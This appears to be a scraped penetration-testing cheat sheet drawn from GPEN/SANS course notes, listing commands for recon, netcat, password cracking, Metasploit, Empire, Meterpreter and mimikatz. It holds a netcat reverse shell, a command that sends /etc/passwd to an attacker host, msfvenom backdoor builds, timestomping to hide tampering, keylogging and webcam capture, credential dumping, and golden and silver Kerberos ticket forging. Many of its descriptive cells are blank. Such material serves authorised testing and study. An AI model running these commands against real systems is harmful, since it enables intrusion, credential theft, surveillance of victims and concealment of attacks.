General Reconn
fping -g x.x.x.0 x.x.x.254 -a
|
Ping sweep |
Linux traceroute Options |
|
Forces IPv4 |
|
Forces IPv6, same as traceroute6 command |
|
Uses ICMP echo |
|
Uses TCP SYN |
|
Starts from the hop specified instead of 1 |
|
Routes packets through the gateway specified instead of the default |
|
Specifies the maximum number of hops; default is 30 |
|
Specifies not to resolve IP address to hostnames |
|
Specifies the wait time, which can be in seconds or relative to the reply time between hops |
|
Specifies the port |
DNS Query
nslookup |
nslookup -norecurse -type=A google.com DNS_SRVR_IP
|
DNS Snooping | nonrecursive query |
server [serverIPaddr or name]
|
use specific server |
|
set DNS record type |
|
Perform a zone transfer of all records for a given domain |
ls -d [target__domain] [> filename]
|
Store zone transfer output in a file |
|
view file |
dig |
dig @[name server] [domain name] [record type]
|
dig comand syntax |
dig +nocomments @192.168.1.50 lab.local -t AXFR
|
test if allows anonymous zone transfers |
set norecurse |
no recursive query, RD=0 |
Netcat
Flags |
|
Listen mode (default is client) |
|
Listen harder (Windows only) — Make a persistent listener |
|
UDP mode (defaultis TCP) |
|
Local port (In listen mode, this is port listened connections on. In client mode, this is source port for packets sent.) |
|
Program to execute after connection occurs |
|
Don’t resolve names |
|
Zero—I/O mode: Don’t send any data, just emit packets |
|
Timeout for connects, waits for N seconds |
|
Be verbose, printing when a connectionis made |
|
executes a command upon connection |
|
Be verbose, printing when connections are made, dropped, and so on |
General |
|
Server listen, verbosity,noDNS,on port XX |
SHELLS |
|
Client reverse shell |
rm -f /tmp/f ; mkfifo /tmp/f ; cat /tmp/f|/bin/sh -i 2>&1|nc $RHOST $RPORT >/tmp/f
|
netcat -e alternative example |
On target: |
|
nc --1 -p [allowed_inbound_port] 0<backpipe | nc 127.0.0.1 22 1>backpipe
|
Attackers machine to connect: |
ssh login_name@[targetmachine] -p [allowed_inbound_port]
|
A really good explanation for this is on 560.3 book, P 152 |
Send Files |
|
setup listener and output file |
nc -w 3 attackerIP 8080 < /etc/passwd
|
sends file to netcat listener with 3 secs timeout |
Scan ports |
|
test 1 port |
nc -v -w 2 -z IP_Address port_range
|
port range |
echo "" | nc -v -n —w1 [targetIP] [port—range]
|
a port scanner that harvests banners |
Other Uses |
while (true); do no -vv -z -w3 [targeb_IP] [target_port] > /dev/null && echo -e "\x07"; sleep 1; done
|
Service-is-alive heartbeat |
while `nc —vv -z —w3 [target_IP] [target_port] > /dev/null` ;do echo "Service is ok"; sleep 1; done; echo "Service is dead"; echo —e "\x07"
|
Service-ls-Dead Notification |
alternative |
nc -n -v -l -p 2222 < /tmp/winauth.pcap
|
Setup listener that will send the file |
nc.exe -n -v -w3 [YourLinuxIPaddr] 2222 >C:\folder\winauth.pcap
|
Client to capture and save the file |
TCPDUMP | Monitoring
General |
|
start capturing traffic |
|
Use numbers instead of names for machines |
|
Use numbers for machines and ports |
|
Sniff on a particular interface (—D lists interfaces) |
|
Be verbose |
|
Dump packets to a file (use —r to read file later) |
|
Print hex |
|
Print hex and ASCII |
|
Print ASCII |
|
Sniff this many bytes from each frame, instead of the defaul |
Protocol: |
ether, ip, ip6 , arp, rarp, tcp, udp: protocol type
|
Type: |
|
Only give me packets to or from that host |
|
Only packets for a given network |
|
Only packets for that port |
|
Only packets in that range of ports |
Direction: |
|
Only give me packets from that host or port |
|
Only give me packets to that host |
Use and
/ or
to combine these together |
Wrap in parentheses to group elements together |
Hashcat
hashcat -m 1800 -a 0 -o found1.txt crack1.hash 500_passwords.txt
|
crack Linux SHA512 password with dict |
hashcat --force -m 13100 -a 0 lab3.hashcat /path/to/Dict.txt --show
|
Crack Kerberos Service Ticket for account password |
PowerSploit/PowerView
|
Requests service tickets for kerberoast-able accounts and returns extracted ticket hashes |
Metasploit
Create Handler listener |
use exploit/multi/handler
|
set payload windows/x64/meterpreter/reverse_https
OR windows/meterpreter/reverse_tcp
|
|
|
|
Run in ackground |
PS Session with valid creds |
use auxiliary/admin/smb/psexec_command
|
|
|
|
set command "ipconfig or any command"
|
|
Create backdoor - recognized by Defender :( |
msfvenom -p windows/shell/reverse_tcp LHOST= [AttackerIP] LPORT=8080 -f exe > /tmp/file.exe
|
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=AttackerIP LPORT=443 -f exe -o pwned.exe
|
Others |
|
get a list of sessions |
|
interact (-i) with session number [N] |
|
Background session |
|
get background jobs |
db_import /path/to/file/nmap.xml
|
Import scans from nmap |
hosts -m "Windows 10" 192.168.1.10
|
Add comment to host |
|
Show UP hosts with Lports 135,445 |
|
list help for sessions command |
|
kill a session |
Empire
set up an Empire HTTP listener |
usestager windows/launcher_bat
|
|
|
|
|
|
chose an agent |
download C:\Users\alice\Desktop\some.txt
|
transfer file from agentPC |
Timestomping |
|
upload content from /tmp to actual session directory |
usemodule management/timestomp
|
load timestomp module |
set ALL 03/02/2020 5:28 pm
|
define time to be set in all datetime file properties |
set FilePath bank_login_information.txt
|
set target file to be tampered |
|
run module |
Others |
/opt/Empire-master/downloads/
|
Empire Download's location |
sell powershell Get-ChildItem
|
Run powershell command |
General |
? |
Get command suggestions |
searchmodule privesc |
search for modules |
configure a listener |
listeners |
getting a list of our listeners |
options |
options we have for our listeners |
set StagingKey [Some_Secret_Value] |
configure a custom staging key for encrypting communications |
set DefaultDelay 1 |
time between callbacks from our agent |
execute |
launch listener |
list |
check out our listene |
deploy an agent |
usestager |
create and deploy an agent | [space][TAB-TAB] To see available stagers |
usestager 1auncher_bat |
select stager |
info |
get info for actual stager |
MSFDB - Metasploit Database
Most useful database commands |
db_connect [connect_string]
|
Connects to a database |
|
Disconnects from database |
|
Selects the database type |
|
Displays the status of the database |
|
Exports database contents into a file, either xml (with hosts,ports, vulnerabilities, and more) or pwdump (with pilfered credentials) |
|
Get list of hosts disvcovered |
|
Get list of vulns that were found in scanned hosts |
|
Get list of services running in gained hosts |
|
manually add hosts |
services --add -p [port] -r [proto] -s [name] [hostl,host2,...]
|
manually add services running in hosts |
notes --add -t [type] -n '[note_text]' [hostl,host2,...]
|
manually add notes to a host |
If you delete a host, any services and vulns corresponding to that host_id will also disappear |
db_nmap --sT 10.10.10.10 --packet—trace
|
invoke Nmap directly from the msfconsole |
|
import data | automatically recognizes the file type like Nmap xml, Amap, Nexpose, Qualys, Nessus |
|
searching for any hosts associated with linux, -S works for other items (vulns) as well |
|
set result as RHOTS variable value |
|
Look for vulnerabilities based on port number |
Veil-Evasion
Start Veil-Evasion |
cd /opt/Veil-Evasion || /usr/share/veil
|
|
General |
|
get a list of all the different payloads that the tool can generate |
info powershell/meterpreter/rev_https
|
et more information about any of the payloads |
|
Clean out any leftover cruft from previous use of Veil-Evasion, |
Generate payload |
use info powershell/meterpreter/rev_https
|
select the payload you want to generate |
|
list options for actual item |
|
create the payload file |
Generated files |
|
This is the payload itself |
|
This is the Metasploit configuration file (also known as a handler file) for a multi/handler waiting for a connection from our payload. |
|
exit Veil-Evasion |
/usr/share/veil-output/source
|
Veil-Evasion output directory |
traceroute
Options |
|
Set the initial TI‘L for the first packet |
|
Specify a loose source route (8 maximum hops) |
|
Use ICMP Echo Request instead of UDP |
|
Use TCP SYN instead of UDP (very useful!),with default dest port 80 |
|
Set the maximum number of hops |
|
Print numbers instead of names |
|
port |
|
For UDP, set the base destination UDP port and increment |
|
For TCP, set the fixed TCP destination port to use, defaulting to port 80 (no incrementing) |
|
Wait for N seconds before giving up and writing * (default is 5) |
|
Force use of IPv4 (by default, chooses 4 or 6 based on dest addr) |
|
Force use of IPv6 |
|
|
John the Ripper
General |
john.pot file |
cracked password store |
john.rec file |
stores john's current status |
john --restore |
picks up Where it left off based on the contents of the john.rec file |
john --test |
Check Speed Of SyStem |
john hash.txt |
run john against hash.txt file |
john --show [password_file]
|
compare which passwords John has already cracked froma given password file against itsjohn.pot file |
Cracking LANMAN Hashes |
|
By default, John will focus on the LANMAN hashes. |
Cracking Linux Passwords |
cp /etc/passwd /tmp/passwd_copy
|
copy passwd file to your working directory |
cp /etc/shadow /tmp/shadow_copy
|
copy shadow file to your working directory |
./unshadow passwd_copy shadow_copy > combined.txt
|
Use the unshadow
script to combine account info from /etc/passwdwith password information from /etc/shadow |
john combined. txt |
Run John against the combined file |
cat ~/.john/john.pot |
Look at the Results in john.pot file |
pw-inspector (Password Inspector)
-i |
input file |
-o |
output file |
-m [n] |
the minimum number of characters to use for a password is n |
-M [N] |
Remove all words longer than N characters |
-c [count] |
how many password criteria a given word must meet to be included in the list. |
-l |
The password must contain at least one lowercase character. |
-u |
The Password must contain at least one uppercase character. (To specify a mixed case requirement, configure —c 2 -l —u.) |
-n |
The password must contain at least one number |
-p |
he password must contain at least one printable character that is neither alphabetic nor numeric, whichincludes !@#$%"&*(). |
-s |
The password must include characters not included in the other lists (such as nonprintable ASCII characters) |
Meterpreter
Basic commands |
|
Display a help menu |
|
Quit the Meterpreter |
|
Show name, OS type |
|
Self—explanatory |
|
read or write to the Registry |
File System Commands |
|
Navigate directory structure |
|
Change local directories on attacker machine |
|
Show the current working directory |
|
List the directory contents, even 4 Windows |
|
Display a file’s contents |
|
Move a file to or from the machine |
|
Make or remove directories |
|
Edit a file using default editor |
Process Commands |
560.3 Page 92 |
|
Returns the process ID that Meterpreter is running in |
|
Returns the user ID that the Meterpreter is running with |
|
Process list |
|
Terminate a process |
|
Runs a given program channelized (-c) and hide proccess window (-H) |
migrate [destination_process_ID]
|
Jumps to a given destination process ID: |
|
*Target process must have the same or lesser privileges |
|
*May be a more stable process |
|
*When inside the process, can access any files that it has a lock on |
Network Commands |
|
show network config |
|
Displays routing table, adds/deletes routes |
portfwd add -1 1111 -p 22 -r Target2
|
SANS 560.3 Exploitation Page 67 for better understanding |
On-target Machine commands |
|
SC |
|
Show how long the user at the console has been idle |
uictl [enable/disable] [keyboard/mouse]
|
Turn on or off user input devices |
Webcam and Mic Commands |
|
Lists installed webcams |
|
Snaps a single frame from the webcam as a JPEG: -Can specify JPEG image quality from 1 to 100, with a default of 50 |
|
Records audio for N seconds (—d N) and stores in a wav filein the Metasploit .msf4 directory by default |
Make sure you get written permission before activating either feature |
Keystroke Logger |
|
poll every 30 milliseconds for keystrokes entered into the system |
|
flushes 1 Megabyte of buffer keystrokes captured to attacker's Meterpreter Screen |
|
tells the Meterpreter to stop gathering all keystrokes |
Pivoting Using Metasploit’s Route Command |
|
|
set PAYLOAD windows/meterpreter/reverse_tcp
|
|
|
background session... will display meterpreter sid |
route add [victim2_subnet] [netmask] [Sid]
|
direct any of its packets for a given target machine or subnet through that Meterpreter session |
|
|
|
|
Do not confuse the Metasploit (msf) route command with the Meterpreter route command. The latter is used to manage the routing tables on a target box that has been compromised using the Meterpreter payload. The msf route command is used to direct all traffic for a given target subnet from the attacker’s Metasploit machine through a given Meterpreter session on a compromised victim machine to another potential Victim. |
Additional Modules |
|
load additional modules |
Others |
run schtasksabuse -c "[command1][,command2]..." -t [targetIP]
|
script that automates Win-schtasks task creation |
|
Uses Meterpreter's process credentials (add -u and -p for other credentials) |
load kiwi |
oad the mimikatz Kiwi Meterpreter extension on the target machine |
creds_all |
grab credentials |
GPG
gpg -d -o <OutputFileName> <EncryptedFileName>
|
decrypt a file |
OVER-PASS-THE-HASH
1. Peform the AS-REQ (encrypting timestamp with passw hash) to get an TGT |
2. Perform TGS-REQ to KDC to get TGS |
3. Use TGS to impersonate passw hash owner and use a service |
Golden Ticket ATTACK
Requirements |
|
(e.g. KRBTGT NTLM hash) |
• Domain admin account name
|
|
• SID of domain admin account
|
Commands |
.\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH
|
.\mimikatz kerberos::ptt file.txt
|
create a golden ticket from file with PTT |
|
Get current session ticket details |
|
Export ticket to a .kirbi file |
kerberos::ptt file.kirbi
|
Load / pass the ticket |
Silver Ticket ATTACK
Requirements |
|
target server’s FQDN. |
|
SPN |
|
NTLM hash for the service (computer account or user account) |
Steps |
|
get domain/SID |
invoke-Kerberoast.ps1
|
get SPN and Service user pass hash for cracking |
Mimikatz “privilege::debug” “sekurlsa::logonpasswords” exit
|
get Service password hash w/Mimikatz (if you have access to server hosting Vuln service) |
hashcat ""$krb5tgs$6$acct$svc/HOST:port$XXXX…XXX"" dicti.txt hashcat -m 13100 hash.txt dicti.txt
|
Get unencrypted service password w/hashcat (If we didn't get NTLM hash) and hash it to NTLM |
Import-Module DSInternals $pwd = ConverTo-SecureString 'P@$$w0rd' -AsPlainText -Force ConvertTo-NTHash $pwd
|
Hash cleartext password to NTLM |
mimikatz “kerberos::golden /admin:ImAdmin /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-XXXXX /target:EXCHANGE.lab.local /rc4:NTLMHash /service:ServiceSPN /ptt” exit
|
Forge TGS to auth target SVC |
misc::cmd ; klist ; use a command to connect to that specific service for example: Find-InterestingFile -Path \\FileServer1.domain.com\S$\shares\
|
Auth to local SVC w/creds and TGS | ej: mimikatz |
Trolling |
Faking RIDs |
1106 is "Anakin" |
/id:1159 |
1159 is "Vader" |
/user:Anakin |
Result: User: Anakin | Real Context User: Vader |
/groups:512,513,518,519 /id:9999 /user:yourmom
|
lulz |
Mimikatz
Command Reference for tickets attacks |
|
domain's fqdn |
|
SID of the Domain |
|
username to impersonate |
|
group RIDs the user is a member of (the first is the primary group) default: 513,512,520,518,519 for the well-known Administrator’s groups |
|
provide a path and name for saving the Golden Ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use. |
|
as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use. |
|
user RID. Mimikatz default is 500 (the default Admin account RID). |
|
the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0. |
|
ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes). |
|
maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes). |
Scapy (Packet crafting)
GPEN AIO Book - Lab 3-4: Scapy Introductory |
|
starts library |
|
Get help for specific function |
|
define blank packet |
|
show packet info |
|
show packet info |
|
show packet info |
|
view just the data |
p[IP].src="ipaddres"
|
set src address |
p[IP].dst="ipaddres"
|
set dst address |
|
set src port |
|
set dst port |
|
packet structure |
Metadata Analysis
./exiftool t/images/ExifTool.jpg >/root/exif.out
|
execute exiftool against the ExifTool.jpg |
strings —n 8 file.txt |
shows strings only eight characters long |
Recon-ng comands for whois_pocs
|
marketplace install all ; exit
|
|
modules load recon/domains-contacts/whois_pocs
|
options set SOURCE example.com
|
|
|
Cron
|
list job entries |
|
edit job entries |
|
Created By
Metadata
Comments
No comments yet. Add yours below!
Add a Comment
Related Cheat Sheets